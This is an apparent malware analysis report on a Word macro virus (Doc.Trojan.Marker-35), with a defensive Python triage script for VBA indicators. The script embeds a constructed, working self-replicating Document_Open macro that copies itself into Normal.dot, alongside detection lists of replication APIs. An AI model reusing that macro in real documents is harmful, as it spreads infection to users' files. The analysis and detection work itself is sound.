Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7160002216b097b0…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 59.5 KB
Created: 2010-06-25 18:44:00
Authoring application: Microsoft Macintosh Word
MD5: ed9ee58781695b75892bd17cc9f41aff
SHA-1: 05cf99835bb20acda89637bb6b53733ac69bc688
SHA-256: 7160002216b097b06d9b2af130adb246910f4c9da78a0e59cec3622eab65980b
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is an OLE (legacy binary Word) document with a critical ClamAV detection, Doc.Trojan.Marker-35. A high-severity heuristic flags a Document_Open macro, which Word runs automatically when the document is opened (subject to the user's macro security setting), and a medium-severity heuristic confirms that VBA macro code is present. The extracted VBA module, saved as 'macros.bas', contains code in the 'Document_Open' subroutine that copies its own source into the Normal.dot global template (so it runs in every document opened afterwards: persistence) and into the active document (so the document carries the infection when it is shared: propagation). The script labels itself 'Anti-Virus macro by Patrick', a misleading comment intended to reassure anyone who reads the code, and it checks for a marker before copying so that it does not re-infect an already infected template or document. That self-recognition check is the classic behaviour of a Word macro virus; its purpose is to keep the infection routine stable, not to hide it from scanners, and the ClamAV signature fires on it regardless.

Heuristics (4)

  • ClamAV: Doc.Trojan.Marker-35 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The document defines a Document_Open subroutine, an auto-execution entry point that Word runs when the file is opened.
  • VBA macros detected [medium] OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main
    This URL is the DrawingML XML namespace identifier that Office itself embeds in documents; it is not a network indicator and does not need follow-up.
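The triage logic behind the OLE_VBA_DOCOPEN and OLE_VBA_MACROS heuristics, the self-replication and marker check described in the summary, and the URL caveat above, as an added example. This is not the analysis platform's code and it does not reproduce the extracted macros.bas: SAMPLE_VBA is a constructed stand-in that mimics the behaviour the report describes (a Document_Open handler that copies the module into Normal.dot after checking a marker), the marker string MARKER-V1, the host list and every heuristic ID other than OLE_VBA_MACROS and OLE_VBA_DOCOPEN are assumptions made for the example.

```python
"""Triage decoded VBA source for the indicators this report relies on.

Added example, not the analysis platform's code and not the real macros.bas.
SAMPLE_VBA is a constructed stand-in; MARKER-V1, SCHEMA_HOSTS and the
heuristic IDs other than OLE_VBA_MACROS / OLE_VBA_DOCOPEN are assumptions.
"""
import re
from urllib.parse import urlparse

# Entry points Word runs without a click (Document_* events and Auto* macros).
AUTOEXEC_SUBS = {"document_open", "document_close", "document_new",
                 "autoopen", "autoclose", "autoexec", "autonew"}

# VBE object-model members a macro needs in order to read and rewrite macro code.
REPLICATION_APIS = ("NormalTemplate.VBProject", "ActiveDocument.VBProject",
                    "VBComponents", "CodeModule", "InsertLines",
                    "AddFromString", "CountOfLines")

# Hosts of XML namespace URIs present in practically every Office file; a URL
# on one of these is a schema identifier, not a network indicator (assumption).
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                "purl.org", "www.w3.org"}

# Constructed sample: the shape of a self-replicating Document_Open handler.
SAMPLE_VBA = """\
Attribute VB_Name = "ThisDocument"
' MARKER-V1  (assumed infection marker; a decoy comment sits here in real samples)
Private Sub Document_Open()
    On Error Resume Next
    Dim src As Object, dst As Object
    Set src = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    Set dst = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    ' Only copy when the global template is not already carrying the marker.
    If InStr(dst.Lines(1, 10), "MARKER-V1") = 0 Then
        dst.DeleteLines 1, dst.CountOfLines
        dst.InsertLines 1, src.Lines(1, src.CountOfLines)
    End If
End Sub
"""

SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)", re.M | re.I)


def find_autoexec(src):
    """Names of declared procedures that Word auto-runs."""
    return [m.group(1) for m in SUB_RE.finditer(src)
            if m.group(1).lower() in AUTOEXEC_SUBS]


def find_replication(src):
    """VBE object-model members referenced by the code (case-insensitive)."""
    low = src.lower()
    return [api for api in REPLICATION_APIS if api.lower() in low]


def find_infection_marker(src):
    """A literal tested with InStr() that also appears verbatim in a comment:
    the 'am I already here?' check of a macro virus. None if absent."""
    for m in re.finditer(r'InStr\s*\(.*?"([^"]+)"', src, re.I):
        lit = m.group(1)
        if re.search(r"^\s*'.*" + re.escape(lit), src, re.M):
            return lit
    return None


def triage_vba(src):
    """Return (id, severity, detail) findings in the report's own style."""
    findings = []
    if SUB_RE.search(src):
        findings.append(("OLE_VBA_MACROS", "medium", "Document contains VBA macro code"))
    auto = find_autoexec(src)
    if auto:
        hid = "OLE_VBA_DOCOPEN" if any(a.lower() == "document_open" for a in auto) \
            else "OLE_VBA_AUTOEXEC"
        findings.append((hid, "high", "auto-exec macro: " + ", ".join(auto)))
    rep = find_replication(src)
    if len(rep) >= 3:  # reading plus writing module code, not one stray word
        findings.append(("VBA_SELF_REPLICATION", "high",
                         "writes macro code via " + ", ".join(rep)))
    marker = find_infection_marker(src)
    if marker:
        findings.append(("VBA_INFECTION_MARKER", "info",
                         "re-infection guard on literal %r" % marker))
    return findings


def classify_url(url):
    """'schema-namespace' for well-known XML namespace URIs, else 'review'."""
    host = (urlparse(url).hostname or "").lower()
    return "schema-namespace" if host in SCHEMA_HOSTS else "review"


if __name__ == "__main__":
    for fid, sev, detail in triage_vba(SAMPLE_VBA):
        print(f"{fid:<22} {sev:<7} {detail}")
    print(classify_url("http://schemas.openxmlformats.org/drawingml/2006/main"))
```

The replication check deliberately requires several VBE object-model members at once: a single word such as "CodeModule" in a comment is not evidence, but reading one module and inserting lines into another is. Run the script against the decoded output of olevba (the Source column below) rather than against the raw OLE stream, since the VBA is stored compressed.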

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: f5002f7cabdb72007a507ea4a68dfb172e6f199556c3c2b08e39298247953581
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1590 bytes